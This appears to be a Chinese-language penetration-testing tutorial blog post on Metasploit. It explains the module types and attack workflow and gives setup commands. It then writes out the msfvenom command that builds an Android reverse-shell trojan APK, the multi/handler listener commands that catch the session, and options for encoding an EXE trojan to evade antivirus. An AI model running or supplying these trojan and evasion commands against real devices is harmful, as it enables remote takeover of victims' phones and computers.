MSF

模块:
1、Auxiliaries(辅助模块)

        该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

2、Exploit(漏洞利用模块)

        漏洞利用是指渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

3、Payload(攻击载荷模块)

        攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

4、Post(后期渗透模块)

        该模块主要用于取得的目标系统远程控制权后,进行的一系列的后渗透攻击动作,如获取敏感信息、实施跳板等。
5、Encoders(编码工具模块)

        该模块在渗透测试中负责免杀,防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

MSF渗透攻击流程

  • 扫描目标机系统,寻找可用漏洞。
  • 选择并配置一个漏洞利用模块。
  • 选择并配置一个攻击载荷模块。
  • 选择一个编码技术,用来绕过杀毒软件的查杀。
  • 渗透攻击。

主机扫描
关注点是目标机器I[P地址、可用服务、开放端口等。
使用

service postgresql status			#查看 postgresql 服务状态
service postgresql start			#启动 postgresql 服务

msfdb init                          #初始化数据库

msfconse                            #启动msf

db_status                           #进入msf后输入查看数据库连接状态

简单示例
msf生成apk木马(不免杀)

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=4444 -o shell.apk

-p             指定payload
-o 			   输出      #因为-f列表里没有apk后缀,所以直接输出也可以

把apk安装到手机,然后运行。
之后就是msf上线:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 4444
set PAYLOAD android/meterpreter/reverse_tcp
exploit
#连上木马,可以使用?来查看命令。

msf生成exe木马(不免杀)

-e				指定编码方式对攻击载荷进行重新编码
-x              指定木马捆绑在哪个可执行程序模板上
-i				指定对目标编码的次数,大概多次编码有助于免杀
-f				指定MSF编码器输出的程序格式
-o				指定文件处理完后的输出的路径
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值